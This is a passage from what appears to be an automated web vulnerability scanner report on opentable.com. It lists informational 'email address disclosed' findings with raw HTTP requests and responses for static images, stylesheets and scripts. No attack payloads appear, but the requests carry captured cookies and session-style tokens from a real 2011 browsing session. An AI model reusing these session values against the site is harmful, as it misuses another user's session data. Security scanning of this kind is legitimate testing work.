Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref

Response

HTTP/1.1 200 OK
Content-Length: 2078
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:08:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:38 GMT

.PNG
.
...IHDR...<..........{......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...L.G..w........p..X.c.%.
.RS.    .....4%...!M#i.ilbIckL4i..@......6..?Z#)J../.._.{xwt.8...l.s....d.;3o....3.f.....
...[SNIP]...
20.72. http://www.opentable.com/frontdoor/img/ot_btn_black.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/img/ot_btn_black.png

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/img/ot_btn_black.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref

Response

HTTP/1.1 200 OK
Content-Length: 3039
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:08:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:39 GMT

.PNG
.
...IHDR.......E.....E..i...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.73. http://www.opentable.com/frontdoor/js/jquery-ui/css/custom-theme/images/ui-bg_flat_75_ffffff_40x100.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/js/jquery-ui/css/custom-theme/images/ui-bg_flat_75_ffffff_40x100.png

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/js/jquery-ui/css/custom-theme/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 178
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:08:56 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:43 GMT

.PNG
.
...IHDR...(...d......drz...yIDATh...1.. ...R...    .7..(..........V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V..`%X    V.j...)2.N....IEND.B`.
20.74. http://www.opentable.com/frontdoor/js/jquery-ui/css/custom-theme/jquery-ui-1.8.5.custom.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/js/jquery-ui/css/custom-theme/jquery-ui-1.8.5.custom.css

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/js/jquery-ui/css/custom-theme/jquery-ui-1.8.5.custom.css HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 25347
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:30 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:40 GMT

.ui-helper-hidden{display:none;}.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size:1
...[SNIP]...
20.75. http://www.opentable.com/frontdoor/js/jquery-ui/jquery-ui-1.8.11.custom.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/js/jquery-ui/jquery-ui-1.8.11.custom.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/js/jquery-ui/jquery-ui-1.8.11.custom.min.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 199428
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:52 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:40 GMT

(function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.ext
...[SNIP]...
20.76. http://www.opentable.com/frontdoor/js/jquery-ui/jquery.scrollTo-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/js/jquery-ui/jquery.scrollTo-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/js/jquery-ui/jquery.scrollTo-min.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 200 OK
Content-Length: 1933
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:54 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:42 GMT

(function(d){var k=d.scrollTo=function(a,i,e){d(window).scrollTo(a,i,e)};k.defaults={axis:"xy",duration:parseFloat(d.fn.jquery)>=1.3?0:1};k.window=function(a){return d(window)._scrollable()};d.fn._scr
...[SNIP]...
20.77. http://www.opentable.com/httphandlers/MetroData.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /httphandlers/MetroData.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /httphandlers/MetroData.aspx?m=4&mc=US&v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 13631

var OTLOOKUP_METROS = new Hash({45:[45,'Alabama',[33.4886090,-86.7568810]],331:[331,'Amsterdam',[52.3765710,4.9071000]],212:[212,'Anchorage',[61.2175750,-149.8877980]],95:[95,'Arkansas',[35.2142097,-9
...[SNIP]...
20.78. http://www.opentable.com/img/borders/modules/all-corners.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/all-corners.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/all-corners.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 7584
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:57 GMT

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.79. http://www.opentable.com/img/borders/modules/ot_borders_noshadow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_borders_noshadow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_borders_noshadow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 84
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:40 GMT

GIF89a...............................!.......,...........H.,3..)...........HR..]Y..;
20.80. http://www.opentable.com/img/borders/modules/ot_borders_noshadow_green.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_borders_noshadow_green.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_borders_noshadow_green.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 49
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:38 GMT

GIF89a.........v...!.......,...........D......+.;
20.81. http://www.opentable.com/img/borders/modules/ot_borders_promos_noshadow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_borders_promos_noshadow.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_borders_promos_noshadow.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3591
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

.PNG
.
...IHDR................7...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.82. http://www.opentable.com/img/borders/modules/ot_box_noshadow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_box_noshadow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_box_noshadow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1585
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:34 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:51 GMT

GIF89a=.K......{....................................................................................................|..................................................................................
...[SNIP]...
20.83. http://www.opentable.com/img/borders/modules/ot_box_noshadow_green.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_box_noshadow_green.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_box_noshadow_green.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 505
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:50 GMT

.PNG
.
...IHDR...=...K.......XE...0PLTE..~........................................v..........tRNS.................#]....hIDATx....i.P.EQ.$.(H..a...... ..,..Eg.
i.b%$..2.......s&........]....d.....
...[SNIP]...
20.84. http://www.opentable.com/img/borders/modules/ot_box_promos_noshadow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_box_promos_noshadow.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_box_promos_noshadow.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 493
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:51 GMT

.PNG
.
...IHDR...)...?............6PLTE.......................................................r*r....tRNS....0J...dIDATx...9r.P.C....I..Y..TFJ..'@..P..S.......j[..x...q.kk5.>....|..awb....S.....OU
...[SNIP]...
20.85. http://www.opentable.com/img/borders/modules/ot_box_white_noshadow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/ot_box_white_noshadow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/ot_box_white_noshadow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 796
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:51 GMT

GIF89a).?....................................................!.......,....).?....p-.@.8....`(.di.h..l..p,.tm.x..|....pH,....r.............v..z...xL.....z.n....|N.....~..................p..............
...[SNIP]...
20.86. http://www.opentable.com/img/borders/modules/popup_corners.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/popup_corners.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/popup_corners.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2156
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:57 GMT

GIF89ad.P................SMH...........~..................($%kii...B8,....u......................................................e]S........................LB7...................................{....
...[SNIP]...
20.87. http://www.opentable.com/img/borders/modules/tabmanager_coners_thick.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/borders/modules/tabmanager_coners_thick.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/borders/modules/tabmanager_coners_thick.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 788
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
